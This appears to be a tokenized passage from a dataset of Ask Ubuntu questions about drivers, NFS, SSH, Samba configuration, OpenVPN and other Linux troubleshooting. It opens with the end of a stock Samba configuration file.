the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # server role . defines in which mode samba will operate . possible # values are `` standalone server '' , `` member server '' , `` classic primary # domain controller '' , `` classic backup domain controller '' , `` active # directory domain controller '' . # # most people will want `` standalone sever '' or `` member server '' . # running as `` active directory domain controller '' will require first # running `` samba-tool domain provision '' to wipe databases and create a # new domain . server role = standalone server # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # # the following settings only takes effect if 'server role = primary # classic domain controller ' , 'server role = backup domain controller' # or 'domain logons ' is set # # it specifies the location of the user's # profile directory from the client point of view ) the following # required a [ profiles ] share to be setup on the samba server ( see # below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home directory as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . # the following parameter makes sure that only `` username '' can connect # to \\server\username # this might need tweaking when using external authentication schemes valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin
440208	having internal error on 12.04 with intel video	i get the xserve-xorg-video-intel problem where it says i need to install it but i 'm unable to find this anywhere . i do the sudu apt-get install -f but still there is nothing that changes . i have turned off the error report so at least that is not bugging out . fyi the graphics seem fine . to whom it may concern , thank you for your help .
440210	how can i start pidgin maximised if maximus does n't do it ?	i use maximus to force applications to open in a maximized window , as suggested in this answer . [ 1 ] however , pidgin message windows are not affected . when i start pidgin , my buddy list does n't appear [ 2 ] and my automatic group chats start , but they appear in the top left of the screen , not maximized . how can i get pidgin chat windows to start maximized ? [ 3 ] can i add/modify the pidgin gtkrc file ? [ 1 ] i found it the simplest reliable solution of those given . it did n't seem to work 100 % in 12.04 , but targets 99 % of windows in 13.10 . [ 2 ] by choice . if i do allow it to appear on startup , it will appear maximized . [ 3 ] i 'd prefer not to switch to another maximizer , unless it is as trivial to install . devil 's pie , while very flexible , requires configuration . as a last resort , i considered installing dp just to make a pidgin rule .
440213	how to play diablo iii on ubuntu ?	is it possible to play diablo 3 on ubuntu ? what should i install to play d3 with good graphics ? how can i get an nvidia video card to work well with diablo iii ?
440219	low-graphics mode after update to 13.10 and reinstaltion of nvidia drivers	i recently updated to 13.10 , it broke all my opencv installation ( impossible to compile or run previous programs that were ok on 13.04 ) . i 've found out that cuda was n't installed anymore , nor were the nvidia drivers . so here i go to try to install them again ( did it in 13.04 ) . i tried all is suggested here : anyone has successfully installed cuda 5.5 on ubuntu 13.10 64-bit ? that is , trying to install from : sudo ./nvidia-linux-x86_64-331.20.run it did n't work and i could recover from the low graphic mode issue . then after enabling the proper repository i tried : sudo apt-get install nvidia-331 it did n't work either and i could recover from the low graphic mode issue . finally sudo apt-get install nvidia-current-updates-dev this got me totally stucked : i now ca n't recover from the low-graphic mode . i 've checked and tried : nvidia driver problem after updating to 12.04 how can i get out of low graphics mode on 12.04 ? ubuntu with opencv are my working tools ... would anyone be able to help ?
440220	/var/www permissions have been changed with chmod -r 777	how do i revert back to the original settings for this directory ? if it is not possible to revert to original settings , will doing an upgrade to a newer version of ubuntu server 12.04 correct the problem ? i am not experiencing problems but have read that it is not good to change the permissions on these directories regards benjamin
440223	no right click on desktop	i am running ubuntu 12.04 and login in under a ubuntu 3d . recently i lost the ability to right click on the desktop . what happened was that after installing pcmanfm there was a an option that appeared on a menu along the lines of `` add menus from other applications '' ( or something like that ) . as soon as i added that boom , my right click disappeared . i have tried re-installing gnome , nautilus , pcmanfm , advanced settings , all with no luck . the only thing that restores the function of the right click is to remove pcmanfm . if i think about what started this , i tried to go into configuration editor/gnome terminal/global there is a setting that says `` use menu accelerators '' not sure if this is related or not , but if i make a change to the value there it will not save . the problem with all this is that i am trying to have unity manage the desktop so that the trash and computer icons are visible , however when i install pcmanfm and reboot , these trash & computer icons disappear . in any case i have two machines both with fresh installs , and the other machine has this setup fine , and on this machine i cant figure it out . any help would be appreciated .
440224	nfs mount fails on ubuntu 12.04	i 'm facing a problem with nfs mounts . i manage a cluster with five ubuntu 12.04 nodes . i need to nfs export some paths in the main node to run my applications . ping and ssh are working fine if i boot without the nfs shares . after stopping and restarting the system secondary nodes can not boot as they ca n't get the nfs shares . in the boot process i get this error messages : starting block the mounting event for nfs filesystems until statd is running stopping mount filesystems on boot starting nfsv4 id < - > name mapper i have tried to start the nodes in recovery mode , edit /etc/fstab to remove the shares and then mount with sudo mount -va but without success : meteo @ ventus2 : ~ $ sudo mount -va [ sudo ] password for meteo : mount : proc ya estรก montado en /proc mount.nfs : timeout set for fri mar 28 09:30:01 2014 mount.nfs : trying text-based options 'vers=4 , addr=192.168.1.1 , clientaddr=192.168.1.2' mount.nfs : mount ( 2 ) : connection refused mount.nfs : trying text-based options 'vers=4 , addr=192.168.1.1 , clientaddr=192.168.1.2' mount.nfs : mount ( 2 ) : connection refused mount.nfs : trying text-based options 'vers=4 , addr=192.168.1.1 , clientaddr=192.168.1.2' mount.nfs : mount ( 2 ) : connection refused i also tried meteo @ ventus2 : ~sudo service statd restart statd stop/waiting statd start/running , process 3759 meteo @ ventus2 : ~ $ ps -ef | grep statd statd 3544 1 0 09:24 ? 00:00:00 rpc.statd -l and then mount but it does not work . here you can see /etc/fstab and hosts in secondary node ventus2 fstab ventus : /home/meteo/mirror /home/meteo/mirror nfs hosts 192.168.1.1 ventus.ceam.es ventus 192.168.1.2 ventus2.ceam.es ventus2 and /etc/exports in main node ventus 192.168.1.1 ventus 192.168.1.2 ventus2 the funny thing is that the system had been working since the stop and start event this week . the main node is the only one with internet connection so the system is regularly updated , the secondary ones remain with their first ubuntu 12.04 system . maybe a version conflict ? mount -v gives the same version . mount from util-linux 2.20.1 ( with libblkid and selinux support ) any idea or suggestion ? i 'll continue looking through the web . thanks in advance
440227	splitting a video into multiple parts	i have several large videos that i want to split into parts . the only way to do that i know is to split one part at a time with openshot . i have to split , wait a long time , delete the part , split the next part , ... is there a better way ? i tried to google but it seems all the methods also require splitting one part at a time . this is really inconvenient as i need each video to be split into 20-30 parts . i want to be able to just mark all the split point and come back later and find it all done . does anyone know a way ? update : now i 'm working on a command line solution . i tried this command but the only problem is that there are few seconds of where the video freezes in the beginning ( and end ) of each output split . avconv -i x.mp4 -ss 00:00:00 -t 00:01:00 -c : v copy -c : a copy out.mp4 -ss 00:01:00 -t 00:01:00 -c : v copy -c : a copy out1.mp4 -ss 00:02:00 -t 00:01:00 -c : v copy -c : a copy out2.mp4 -ss 00:03:00 -t 00:04:00 -c : v copy -c : a copy out3.mp4
440229	removing gnome desktop	while removing gnome desktop environment i have removed the unity also and after restarting ubuntu i am unable to login sudo apt-get purge abiword abiword-common abiword-plugin-grammar abiword-plugin-mathview alacarte argyll cups-pk-helper epiphany-browser epiphany-browser-data evolution evolution-common evolution-plugins fonts-cantarell fonts-lyx gdm gir1.2-accountsservice-1.0 gir1.2-caribou-1.0 gir1.2-clutter-gst-2.0 gir1.2-evince-3.0 gir1.2-gck-1 gir1.2-gconf-2.0 gir1.2-gcr-3 gir1.2-gdesktopenums-3.0 gir1.2-gkbd-3.0 gir1.2-gnomedesktop-3.0 gir1.2-gst-plugins-base-1.0 gir1.2-gstreamer-1.0 gir1.2-ibus-1.0 gir1.2-mutter-3.0 gir1.2-networkmanager-1.0 gir1.2-panelapplet-4.0 gir1.2-polkit-1.0 gir1.2-telepathyglib-0.12 gir1.2-telepathylogger-0.2 gir1.2-upowerglib-1.0 gir1.2-xkl-1.0 gjs glchess glines gnect gnibbles gnobots2 gnome-applets gnome-applets-data gnome-color-manager gnome-desktop-data gnome-dictionary gnome-games gnome-games-extra-data gnome-icon-theme-extras gnome-mahjongg gnome-packagekit gnome-packagekit-data gnome-panel gnome-panel-data gnome-search-tool gnome-session-fallback gnome-shell gnome-shell-common gnome-software-manager gnome-sushi gnome-tweak-tool gnome-update-viewer gnotravex gnotski gnumeric gnumeric-common gnumeric-doc gstreamer1.0-alsa gstreamer1.0-plugins-base-apps gstreamer1.0-pulseaudio gstreamer1.0-tools gtali iagno itstool libabiword-2.9 libaudit0 libcaribou-common libcaribou0 libcolamd2.7.1 libcolord-gtk1 libedataserverui-3.0-4 libevolution libgdict-1.0-6 libgdict-common libgdome2-0 libgdome2-cpp-smart0c2a libgjs0c libgoffice-0.8-8 libgoffice-0.8-8-common libgtkmathview0c2a libicc2 libimdi0 libiptcdata0 liblink-grammar4 libloudmouth1-0 libmail-spf-perl libmozjs185-1.0 libmutter0 libnetaddr-ip-perl libots0 libpst4 libtidy-0.99-0 libtracker-extract-0.14-0 libtracker-miner-0.14-0 libtracker-sparql-0.14-0 libwv-1.2-4 libytnef0 lightsoff link-grammar-dictionaries-en lp-solve mutter mutter-common packagekit packagekit-backend-aptcc packagekit-tools plymouth-theme-ubuntu-gnome-logo plymouth-theme-ubuntu-gnome-text python-cloudfiles python-packagekit quadrapassel re2c simple-scan spamassassin spamc swell-foop tracker tracker-extract tracker-gui tracker-miner-fs tracker-utils ubuntu-gnome-default-settings ubuntu-gnome-desktop xsltproc yelp-tools i have also used sudo apt-get remove and also used the purge command to remove ubuntu unity
440232	error ! bad return status for module build on kernel : 3.11.0-15 generic ( x86_64 )	i 've installed ubuntu 12.04 lts and i have multiple gpus ( r9 280x , msi gaming 3g ) . i 've followed the guides on how to install the gpu drivers correctly . unfortunately , no matter what , during the install i get this error : error ! bad return status for module build on kernel : 3.11.0-15 generic ( x86_64 ) consult /var/lib/dkms/fglrx/13.251/build/make.log for more information . it is driving me insane . this occurs when i run : sudo dpkg -i fglrx*.deb moreover , it gives me some a `` system program problem detected '' message and then another popup arrives saying , `` a problem occurred while installing software '' package : 'fglrx ' . before all of this , immediately after i did a fresh install from my usb stick , i did a sudo apt-get update & & sudo apt-get upgrade & & sudo apt-get dist-upgrade in order to upgrade my kernel to 3.11.0-18-generic . how the heck can i fix this ? it 's driving me insane . i am legitimately losing my mind . i believe this is stopping me from correctly creating a .xorg file and booting into ubuntu ( currently getting black screen ) , very much the same way that it happened with this guy : fglrx - bad return status for kernel . please please please help !
440235	ubuntu install option `` install alongside windows 7 '' is missing	i have installed windows 7 and now i want to install ubuntu alongside windows 7 . while doing the installation , after some steps i am not getting the `` install ubuntu alongside windows 7 '' option in the booting process . what should i do now ? when i am watching in youtube , it is visible as `` install ubuntu alongside windows 7 '' but not while am doing it . please tell me how to resolve this problem .
440239	can i modify the cinelerra interface ?	i do n't like the cinelerra interface . i tried to modify it but i did n't find a solution . it is possible to put all the windows in cinelerra on one window like in gimp ?
440241	files in download folder get deleted	the download folder got emptied , while i was watching a video from the same folder . this is the second time it has happened . could it be a worm ? i have not installed any programs that clean up my pc . the programs that were running were linuxdc++ , firefox , document viewer . i am running saucy . please comment for any log file needed . this question had similar case , except for the fact that many of my files were downloaded a month ago .
440245	how do i run netbeans from the terminal ?	i have installed a jdk + netbeans bundle from the downloaded .sh file . now i have the netbeans shortcut on my desktop but i ca n't run netbeans from the terminal . when i run : sudo dpkg -- get-selections netbeans is not on the list and also i ca n't find it in the ubuntu software center . how do i run it from the terminal and how do i find it in the system ? when i installed emacs using apt-get it appeared in the main menu and i could launch it from the terminal straight away . how do these two installations differ ?
440248	intel nuc no sound over hdmi	hi i have just installed ubunutu 13.10 on my intel nuc with a celeron n2820 processor . i am not getting any sound over hdmi . i have tried installing to pulse audio app with no luck .
440250	possible to have a deeper zoom on images in nautilus ?	i am using ubuntu 13.10 and its files app . i guess this is nautilus as well . when i zoom images i can zoom like 4-5 steps in , but images are still too small to view details . can i zoom more levels so i do n't have to use external image viewer ? i just need to view images at larger zoom . i am not sure if i am wrong , but i think that before 13.10 nautilus was able to zoom much deeper .
440252	installation problem lubuntu-13.10	i 'm trying to install lubuntu-13.10 onto my laptop as the xp operating system replacement . vale xp . laptop is asus . system type x86-based pc , processor 1596mhz , total physical memory 512mb , available physical memory 216mb . i unzip the .iso file from the cd drive . i click on wubi.exe and it all looks to be going well . full green bar for 'installing lubuntu-13.10 ' . 1/5 green bar for 'remaining time approximately 0s ' , then this error mesage : `` an error occurred : no such file or directory . for more information , please see the log file : c : \docume~1\admini~1\locals~1\temp\wubi-13.10-rev284.log '' any help greatly appreciated . gav
440256	how do i create a system file /etc/modprobe.d/ath9k.conf ?	i have no idea about linux . my wireless adapter ( atheros ) will not work - i 've tried extensive troubleshooting with @ danatela ( bless his/her heart ) here : wireless not working - asus x450j - qualcomm atheros but it failed . other answered questions refer to this : http : //crunchbang.org/forums/viewtopic.php ? id=17833 but i have nfi how to create a file in this directory - i do n't have permissions ? wtf ? how do i set myself to admin ? ? ? ? > please help ! i have university assessments due , i deleted all off my windows recovery partitions to use this stupid os - i need my freaking wireless to work ! ! ! ! ! !
440259	how to properly create a virtual machine for windows ?	hello my problem is the following : i want to get to use ubuntu but yet i need windows for my studies ( for like visual studio and other stuff does work only under windows ) so i was thinking of making ubuntu my primary os and then create a virtual machine with oracle virtualbox .. i really could use some advice on that .. virtual machine or two os at the same time .. note : i tried the both os at the same time but i had problems with permissions ..when i can read/write on windows , ubuntu doesnt have even read permissions and vice versa ..
440261	can t update ssh	i have two server , the first ( target ) is running my website and can t be rebooted . the second is my backup server . i want backup to be able to rsync to target . i can connect to the two with putty on windows , but when i try to ssh from backup to target , i get a timeout . ( but target can ssh to backup ... ) . on backup server , i have : backup $ ssh -v openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012 but on the targeted server : target $ ssh -v openssh_5.9p1 debian-5ubuntu1.2 , openssl 1.0.1 14 mar 2012 i believe it s why i can t get backup to ssh to target . i tried to apt-get update & & apt-get install ssh and apt-get install openssh-server , but the version keep being the same . how can i update target 's ssh server to be able to connect to it from backup ? edit : added the ssh -vvv if someone wonder : backup $ ssh -vvv vod.121video.com openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to target [ xxx.xxx.xxx.xxx ] port 22. debug1 : connect to address xxx.xxx.xxx.xxx port 22 : connection timed out ssh : connect to host target port 22 : connection timed out edit2 : with the config file of sylvain 's answer : backup $ ssh -vvv target openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /root/.ssh/config debug1 : /root/.ssh/config line 1 : applying options for target debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : executing proxy command : exec ssh proxyserver nc -q0 target 22 debug1 : permanently_set_uid : 0/0 debug1 : permanently_drop_suid : 0 debug3 : incorrect rsa1 identifier debug3 : could not load `` /root/.ssh/id_rsa '' as a rsa1 public key debug1 : identity file /root/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /root/.ssh/id_rsa-cert type -1 debug1 : identity file /root/.ssh/id_dsa type -1 debug1 : identity file /root/.ssh/id_dsa-cert type -1 debug1 : identity file /root/.ssh/id_ecdsa type -1 debug1 : identity file /root/.ssh/id_ecdsa-cert type -1 ssh : could not resolve hostname proxyserver : no such file or directory ssh_exchange_identification : connection closed by remote host
440263	wireless network problem	in my laptop , on clicking network icon in the home screen , only `` enable networking '' option is available but no `` enable wireless '' option.hence could not detect any wi-fi signal i recently switched from 12.04 to 13.10 .
440265	lubuntu : session wo n't open : where to find the logs	i have a huge problem here . as i turn on my laptop , i reach the session login splash screen . i select my user name , but straight after my desktop is loaded , a really quick message appears ( too quick to read it ) and i 'm logged out ... i guess something is wrong in a script that should be loaded on startup , but i do n't know how to debug that ... where can i find the logs of session opening ? i tried script filename to register in another console , but that did not work , i tried to edit ~/.config/lxsession/lubuntu/desktop.conf but without success either . any advice will be appreciated ! thanks i 'm using lubuntu 13.10 edit thanks @ ash for reply . here my /var/logs/xorg.0.log file extract , looks like an error there : ( ee ) bug : triggered 'if ( priv- > num_active_touches == 0 ) ' ( ee ) bug : ../../src/synaptics.c:2658 in updatetouchstate ( ) ( ee ) ( ee ) backtrace : ( ee ) 0 : /usr/bin/x ( xorg_backtrace+0x3d ) [ 0x7f5ced093fdd ] ( ee ) 1 : /usr/lib/xorg/modules/input/synaptics_drv.so ( 0x7f5ce4524000+0x2c74 ) [ 0x7f5ce4526c74 ] ( ee ) 2 : /usr/lib/xorg/modules/input/synaptics_drv.so ( 0x7f5ce4524000+0x4b40 ) [ 0x7f5ce4528b40 ] ( ee ) 3 : /usr/lib/xorg/modules/input/synaptics_drv.so ( 0x7f5ce4524000+0x6752 ) [ 0x7f5ce452a752 ] ( ee ) 4 : /usr/bin/x ( 0x7f5cecef1000+0x91ee8 ) [ 0x7f5cecf82ee8 ] ( ee ) 5 : /usr/bin/x ( 0x7f5cecef1000+0xba930 ) [ 0x7f5cecfab930 ] ( ee ) 6 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f5cebff1000+0xfbb0 ) [ 0x7f5cec000bb0 ] ( ee ) 7 : /lib/x86_64-linux-gnu/libc.so.6 ( __select+0x33 ) [ 0x7f5ceacfdde3 ] ( ee ) 8 : /usr/bin/x ( waitforsomething+0x19c ) [ 0x7f5ced09159c ] ( ee ) 9 : /usr/bin/x ( 0x7f5cecef1000+0x54fb1 ) [ 0x7f5cecf45fb1 ] ( ee ) 10 : /usr/bin/x ( 0x7f5cecef1000+0x447ba ) [ 0x7f5cecf357ba ] ( ee ) 11 : /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0x7f5ceac2cde5 ] ( ee ) 12 : /usr/bin/x ( 0x7f5cecef1000+0x44aff ) [ 0x7f5cecf35aff ] ( ee ) i googled this error , and i do n't have the feeling it 's related to the problem i have though ...
440267	how to install cups 1.7.1 on ubuntu 12.04	i need to install cups 1.7.1 on my ubuntu 12.04 , because of cups filter gstoraster bug . i tried to install it from source : ./configure make sudo make install but the service does not start . i reinstalled from repositories but the version is 1.5.2-9ubuntu1 and suffers from the bug cited above . how can i do it ? i tried to search for a ppa but i could not find it . any suggestions ? thanks
440272	any chance of installing ubuntu on existing bcache device formatted with btrfs ?	i setup my system with btrfs as root file system to be able to install additional linux systems later on ( each with separate and small /boot partition ) on separate subvolumes . then i light-heartedly migrated everything to bcache , when i bought my ssd drive . now i 'd like to install ubuntu on it , without sacrificing the previous one . unfortunately none livedvd supports bcache , so they will never recognize my target btrfs root partition . is it still possible to do that ? i guess the alternate dvd installer might help , but it does n't support bcache either . or maybe it is possible to generate my own ubuntu-installer dvd with bcache modules installed . if so , how to do that ?
440278	confguration incorrect while trying to install ubuntu	i am trying to run ubuntu 12.04lts off of a pc i found off the side of the road pentium 4 3.00ghz 512mb ram 128mb gpu 20gb hdd problem is when i place my cd inside and press f11 to access boot menu , it wo n't boot from cd and starts windows xp if i try to open up the cd in xp , it says : d : \ this application has failed to start because the application is incorrect . reinstalling the application may fix this problem i 've tried burning this again and also re downloading ubuntu , i even went as far as to open it in my windows 8 system ( which allowed it ) but it just wo n't do anything in this pc . i 've also tried to do it from other xp pc 's and it 's not working also i know that the dvd-r works , but for some reason wo n't work in windows xp ( no service pack ) i 'll try re-download the service packs to see if that is the issue but i doubt it please help , cheers
440282	problem login in	this might sound noobish , but , i wanted to change my username and password of my computer ( ubuntu 12.4 i think ) i changed the password , and it worked , i changed the username - and it worked , so i logged out and tried to log back in , but every time i enter the new password , the computer goes to a black screen for a sec , then goes back to the log-in page , the only way i can login is by going in with guest . and i ca n't delete anything because i do n't have permission after doing mount -o remount , rw / cd /home ls -al this is the output : total 16 drwxr-xr-x 4 root root 4096 mar 18 09:03 . drwxr-xr-x 23 root root 4096 mar 18 09:49 .. drwxr-xr-x 3 root root 4096 mar 18 09:03 .ecryptfs dr-x -- -- -- 3 itay itay 4096 mar 18 09:09 itay so i did this : mount -o remount , rw / cd /home chmod u+w itay mount -o remount , rw / cd /home/itay mv .xauthority .xauthority.backup now it logged in to my user , but i can login in terminal , what can i do ?
440288	is there a downloadable app that will detect and install a wireless ethernet configuration ?	i 've tried various things to get my wireless ethernet to work , all to no avail . it seems to me that if wired internet can work , then the wireless should also work . would be nice if ubuntu had this feature .
440289	ssh manager like tera term menu or sshmenu for ubuntu	i am looking for a ssh client that works like terraterm and has a menu where i can store the credentials of all the ssh server i want to access . some of the server s i log in have 50++ chars passwords , that are impossible to know by heart . i found a screen-shot of the terra term menu on the net : that 's what i am crying for . do you have a hint ? this is how terra term menu looks like i found sshmenu in apt but it crashes on start : christian @ christian : ~ $ sshmenu /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : can not load such file -- sshmenu ( loaderror ) from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /usr/bin/sshmenu:3 : in ` < main > '
440290	ubuntu 13.10 fans working all the time	i recently installed ubuntu 13.10 and now my fans are working all the time , they never stop . before i had windows 8.1 and then the fans did not work this much at all . the cpu was often quiet . why do the fans work all the time in ubuntu ? can i change it ? i have an asus k56c intel core i7-3537u cpu @ 2.00ghz , 8 gb ram
440291	can not open programs/ run downloads	so i 'm not too familiar with linux and i began to use ubuntu to get familiar with it , i 'm using ubuntu 12.04 and this problem began occurring when my tower fell over last night . i used to be able to open programs such as skype , and run downloads however now it does not seem to work . i am getting no error messages , just nothing happens .
440296	grab a field without a fixed position via awk	i 'm working on a script to wake different lcs on my lan . mac-adresses are hard to memorize so i made myself a list that contains information about the respective pcs . right now the list looks like : dragoner xxx.xxx.xxx.xxx xx : xx : xx : xx : xx : xx theseus yyy.yyy.yyy.yyy yy : yy : yy : yy : yy : yy ... that means , that new entries will always have to be in the form : netbios-name ipv4 mac . the advantage is , that such a list can easily be queried by grep and awk . i 'd rather like to have a list like that : netbios=dragoner ip4=xxx.xxx.xxx.xxx mac=xx : xx : xx : xx : xx : xx netbios=theseus mac=yy : yy : yy : yy : yy : yy ip4=yyy.yyy.yyy.yyy ... in that manner new information could be added more easily and row would n't have to have a certain number of columns ... but i 'm failing to query it via awk .
440297	what 's a good way to mock a remote https api for unit testing my qml app ?	i 'm tinkering with a qml app that interacts with a remote rest api over https . the `` client '' part of the app is neatly packaged into a component and i 'd like to unit test that , but i do n't want to have to rely on the remote service being available whenever i run tests , nor do i want to commit actual transactions . instead , i want to mock the remote service . what is a good way to do this ? i 'm developing on ubuntu trusty , using ubuntu sdk 1.119 .
440299	xubuntu does n't allow music to play when i lock screen	if i 'm locking my screen with xflock4 while playing some music , the music pauses . however , it resumes as soon as i login again . how do i play my music while my screen is locked ?
440302	how to disable ipv6 when connecting to an openvpn server using network manager on a dual-stack system ?	i 'm using the openvpn client through the openvpn network manager plugin on a dual stack ( meaning configured both for ipv4 and ipv6 connectivity ) ubuntu 13.10 to redirect all traffic through the vpn ( redirect-gateway ) . it generally works fine . however , due to the fact that ipv6 is preferred by the system , the vpn `` leaks '' and when connecting to sites that are also available over ipv6 ( like google , or wikipedia ) , the browser connects directly . one solution would be to configure the openvpn server to provide ipv6 connectivity . while possible with openvpn , the plugin for network manager currently does n't support it . since ipv6 connectivity over the vpn is not strictly necessary , i 'd like to simply disable ipv6 on the client when connecting to the openvpn server . is it possible ? if so , how can i do it ?
440304	control mouse pointer using arrow keys ( laptop/no keypad )	i have an application running on ubuntu ( 12.04 ) on a laptop without a numpad . the application takes an image from a webcam and the operator traces a line onto an area of the webcam image . the mouse or trackpad provides no granular control as we are talking lines at the pixel level . i need to be able to move the mouse pointer by holding ctrl+ [ arrow keys ] and preferably to click with ctrl+enter or something . any help appreciated : )
440309	cloudstack mysql issue	i am trying install cloudstack in lab . have three host kvm , management , mysql server . management - 10.x.x.10 mysql-10.x.x.11 when i run this cloudstack-setup-databases cloud : xxxxx @ 10.x.x.11 -- deploy-as=root : password i get error 104 ( 28000 ) access denied for user . i f i execute this without -- deploy-as=root : then it executes successfully and creates the database . i am able to start cloudstack-mamangement servvice and tomcat6 service . but i get a 404 errror when i try to access the ui . i can provide logs and screen shots if needed . thanks and regards perumal raj.j
440311	simple scan : pdf does not open on android ( adobe reader ) ( dated 1970 ! )	i have been scanning some documents lately in order to have them with me on my android tablet or smartphone . i share them on dropbox and open them with adobe reader . the problem is that most of the pdf 's are not opening in the adobe reader on android . i get the following error : the document can not be opened because it is corrupted or damaged . i tried opening it in moon+ reader pro and it does open . my assumption ( based on one scanned document that does open ) is that it is a date-related issue . the document that opens is dated correctly ( the date it was scanned on ) while the others that do not open are dated as in the 1970 . for example the document that opens has the following metadata : producer itext-paulo-155 ( itextpdf.sf.net-lowagie.com ) creator pdftk 1.44 - www.pdftk.com created fri 14 feb 2014 07:02:56 pm eet format pdf-1.4 while the documents that do not open : producer none creator simple scan 3.4.3 created thu 01 jan 1970 01:59:59 am eet format pdf-1.3 is my assumption correct ? and how can i fix that so that i can open them on android and not face this problem again ?
440312	which ppa should i branch for developing the unity desktop ui itself ?	in 14.04 using the ubuntu sdk . imported lp : unity8 , and lp : unity-mir . unity8 requires unity-mir . unity-mir requires qt5 core . i have it installed from the repositories , and so i just do not get what i need to do . i have virtually no experience with cmake -- setting build type to 'relwithdebinfo ' as none was specified . cmake error at cmakelists.txt:63 ( find_package ) : by not providing `` findqt5core.cmake '' in cmake_module_path this project has asked cmake to find a package configuration file provided by `` qt5core '' , but cmake did not find one . could not find a package configuration file provided by `` qt5core '' with any of the following names : qt5coreconfig.cmake qt5core-config.cmake add the installation prefix of `` qt5core '' to cmake_prefix_path or set `` qt5core_dir '' to a directory containing one of the above files . if `` qt5core '' provides a separate development package or sdk , be sure it has been installed . -- configuring incomplete , errors occurred ! see also `` /home/akiva/programming/build-unity-mir-desktop-default/cmakefiles/cmakeoutput.log '' . see also `` /home/akiva/programming/build-unity-mir-desktop-default/cmakefiles/cmakeerror.log '' .
